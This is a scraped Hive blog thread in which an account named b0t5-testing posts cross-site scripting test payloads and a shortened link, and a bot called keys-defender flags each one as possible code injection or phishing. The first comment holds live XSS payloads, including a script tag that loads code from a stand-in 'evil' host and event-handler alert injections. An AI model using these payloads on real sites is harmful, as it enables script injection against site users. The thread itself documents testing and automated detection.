x-s-s--demo by b0t5-testing

View this thread on: hive.blog | peakd.com | ecency.com

Viewing a response to: @b0t5-testing/security-vulnerability-inspection

x-s-s--demo

Just trying to execute some malicious code on a targeted Hive webapp..
 <br/> <script src="https://myevilsite.com/test.js"></script>
<style onload="alert(1)"><xss id=x style="position:absolute;" onanimationcancel="alert(1)"></xss>

👎 keys-defender

`author`	b0t5-testing
`permlink`	demo-xss-39533453
`category`	x
`json_metadata`	{"tags":["test"],"app":"testapp"}
`created`	2020-09-17 03:17:12
`last_update`	2020-09-17 03:17:12
`depth`	1
`children`	3
`last_payout`	2020-09-24 03:17:12
`cashout_time`	1969-12-31 23:59:59
`total_payout_value`	0.000 HBD
`curator_payout_value`	0.000 HBD
`pending_payout_value`	0.000 HBD
`promoted`	0.000 HBD
`body_length`	230
`author_reputation`	11,039,985,899
`root_title`	"security vulnerability inspection"
`beneficiaries`	`[]`
`max_accepted_payout`	1,000,000.000 HBD
`percent_hbd`	10,000
`post_id`	99,668,894
`net_rshares`	-254,287,353
`author_curate_reward`	""

properties (23)vote details (1)

voter	weight	wgt%	rshares	pct	time
keys-defender	0 B		-254,287,353	-1%

@keys-defender · Sep 17 '20 (edited)

kid no xss

<h4>@b0t5-testing Your comment cointains some text that could be a potential attempt to inject malicious code.</h4>
  <div class="phishy">
    <p><i>Investigation in progress..</i></p>
  </div>
  Please forgive any false positives.
  <br>More info: <sub>https://hive.blog/@keys-defender/new-feature-xss-detection-on-chain</sub>
  <br><sub>Comment 1% downvoted to make it less visible. This message is self-voted to be more visible among others.</sub>
  <br><br>@keys-defender<center>https://images.hive.blog/DQmQNsbUEARNLeAYp5bvBP11LhfwwaJgvbiirM8qGx8ner4/image.png</center>

👍 keys-defender

`author`	keys-defender
`permlink`	antixss-keys-defender-bot-1600312635359
`category`	x
`json_metadata`	{"app":"hiveblog/0.1","users":["b0t5-testing","keys-defender"],"image":["https://images.hive.blog/DQmQNsbUEARNLeAYp5bvBP11LhfwwaJgvbiirM8qGx8ner4/image.png"],"links":["https://hive.blog/@keys-defender/new-feature-xss-detection-on-chain"]}
`created`	2020-09-17 03:17:15
`last_update`	2020-09-17 03:26:30
`depth`	2
`children`	2
`last_payout`	2020-09-24 03:17:15
`cashout_time`	1969-12-31 23:59:59
`total_payout_value`	0.000 HBD
`curator_payout_value`	0.000 HBD
`pending_payout_value`	0.000 HBD
`promoted`	0.000 HBD
`body_length`	574
`author_reputation`	89,741,089,699,821
`root_title`	"security vulnerability inspection"
`beneficiaries`	`[]`
`max_accepted_payout`	1,000,000.000 HBD
`percent_hbd`	10,000
`post_id`	99,668,897
`net_rshares`	30,378,735,287
`author_curate_reward`	""

properties (23)vote details (1)

voter	weight	wgt%	rshares	pct	time
keys-defender	0 B		30,378,735,287	100%

@b0t5-testing · Oct 19 '20

Test:
https://bit.ly/1c92v5e

properties (22)

`author`	b0t5-testing
`permlink`	qifpre
`category`	x
`json_metadata`	{"links":["https://bit.ly/1c92v5e"],"app":"hiveblog/0.1"}
`created`	2020-10-19 05:54:51
`last_update`	2020-10-19 05:54:51
`depth`	3
`children`	1
`last_payout`	2020-10-26 05:54:51
`cashout_time`	1969-12-31 23:59:59
`total_payout_value`	0.000 HBD
`curator_payout_value`	0.000 HBD
`pending_payout_value`	0.000 HBD
`promoted`	0.000 HBD
`body_length`	28
`author_reputation`	11,039,985,899
`root_title`	"security vulnerability inspection"
`beneficiaries`	`[]`
`max_accepted_payout`	1,000,000.000 HBD
`percent_hbd`	10,000
`post_id`	100,161,583
`net_rshares`	0

@keys-defender · Oct 19 '20

kid no unsafe links

<div class="pull-right"><img src="https://cdn.steemitimages.com/DQmWTb4AjAXUxBNkiUVuTXAJeirpHgJz7Uih4rdofQe5spn/image.png"></div>
    <div class="phishy"></div> It looks like this comment contains a shortened URL. @keys-defender be careful as sometimes they can hide phishing or compromised websites.
    Here is my preview of the domain so you can decide whether you consider it safe: https://techforluddites.com
    <br>Now checking it against my database of known compromised or unsafe domains.. you'll see another reply if it's in there.
    <br><sub>For more information about risks involved in shortened URLs, read this Forbes article: https://www.forbes.com/sites/ygrauer/2016/04/20/five-reasons-you-should-stop-shortening-urls</sub>.<br><sub>This auto-reply is self-voted to be more visible among others. If this message bothers you reply OFF - (I'll still check previews against my database)</sub>

👍 keys-defender

`author`	keys-defender
`permlink`	antiunsafelinks-keys-defender-bot-1603086897338
`category`	x
`json_metadata`	{"tags":["unsafelinks"],"app":"hivejs/kd"}
`created`	2020-10-19 05:55:00
`last_update`	2020-10-19 05:55:00
`depth`	4
`children`	0
`last_payout`	2020-10-26 05:55:00
`cashout_time`	1969-12-31 23:59:59
`total_payout_value`	0.000 HBD
`curator_payout_value`	0.000 HBD
`pending_payout_value`	0.000 HBD
`promoted`	0.000 HBD
`body_length`	906
`author_reputation`	89,741,089,699,821
`root_title`	"security vulnerability inspection"
`beneficiaries`	`[]`
`max_accepted_payout`	1,000,000.000 HBD
`percent_hbd`	10,000
`post_id`	100,161,584
`net_rshares`	29,119,976,387
`author_curate_reward`	""

properties (23)vote details (1)

voter	weight	wgt%	rshares	pct	time
keys-defender	0 B		29,119,976,387	100%